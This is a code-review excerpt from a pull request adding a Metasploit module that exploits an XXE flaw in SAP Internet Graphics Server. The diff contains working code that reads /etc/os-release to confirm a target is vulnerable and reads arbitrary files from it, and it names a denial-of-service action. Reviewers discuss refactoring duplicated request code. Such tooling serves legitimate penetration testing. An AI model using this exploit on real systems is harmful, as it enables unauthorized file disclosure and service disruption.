modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb

```diff
@@ -0,0 +1,332 @@
+    setup_xml_and_variables
+    make_post_data('/etc/os-release', false) # Create a XML data payload to retrieve the value of /etc/os-release
+    # so that the module can check if the target is vulnerable or not.
+
+    # Send HTTP request
+    begin
+      check_response = nil
+      check_response = send_request_cgi(
+        {
+          'uri' => normalize_uri(@urn),
+          'method' => 'POST',
+          'ctype' => "multipart/form-data; boundary=#{@post_data.bound}",
+          'data' => @post_data.to_s
+        }
+      )
+    rescue StandardError => e
+      print_error("Failed to retrieve SAP IGS page: #{@schema}#{@host}:#{@port}#{@urn}")
+      vprint_error("Error #{e.class}: #{e}")
+    end
+
+    # Check HTTP response
+    if check_response.nil? || check_response.code != 200 || !(check_response.body.include?('Picture') && check_response.body.include?('Info')) || !check_response.body.match?(/ImageMap|Errors/)
+      return Exploit::CheckCode::Safe
+    end
+
+    # Get OS release information
+    os_release = ''
+    analyze_first_response(check_response.body, '/etc/os-release')
+    if @file_content
+      if (os_regex = @file_content.match(/^PRETTY_NAME.*=.*"(?<os>.*)"$/))
+        os_release = "OS info: #{os_regex[:os]}"
+      end
+    end
+
+    # Report service
+    if os_release != ''
+      ident = "SAP Internet Graphics Server (IGS); #{os_release}"
+    else
+      ident = 'SAP Internet Graphics Server (IGS)'
+    end
+
+    report_service(
+      host: @host,
+      port: @port,
+      name: 'http',
+      proto: 'tcp',
+      info: ident
+    )
+
+    # Report and print Vulnerability
+    report_vuln(
+      host: @host,
+      port: @port,
+      name: name,
+      refs: references,
+      info: os_release
+    )
+
+    Exploit::CheckCode::Vulnerable(os_release)
+
+  end
+
+  def run
+    case action.name
+    when 'READ'
+      action_file_read
+    when 'DOS'
+      action_dos
+    else
+      print_error("The action #{action.name} is not a supported action.")
+    end
+  end
+
+  def action_file_read
+
+    # Set up XML data for HTTP request
+    setup_xml_and_variables
+    make_post_data(@file, false)
+
+    # Send HTTP request
+    begin
+      first_response = nil
+      first_response = send_request_cgi(
+        {
+          'uri' => normalize_uri(@urn),
+          'method' => 'POST',
+          'ctype' => "multipart/form-data; boundary=#{@post_data.bound}",
+          'data' => @post_data.to_s
+        }
+      )
+    rescue StandardError => e
+      print_error("Failed to retrieve SAP IGS page: #{@schema}#{@host}:#{@port}#{@urn}")
+      vprint_error("Error #{e.class}: #{e}")
+    end
+
+    # Check first HTTP response
+    if first_response.nil? || first_response.code != 200 || !(first_response.body.include?('Picture') && first_response.body.include?('Info')) || !first_response.body.match?(/ImageMap|Errors/)
+      fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}")
+    end
```

Comment:
All of this seems like the same code thats used at the start of the `check` method. Perhaps we can look at putting this code into a function?

Reply:
https://github.com/rapid7/metasploit-framework/blob/a7d407c89a4140403771c5c3b3419d1fc5eb62f1/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb#L156

Reply:
Very nice, changes for this look good, thanks for implementing it 👍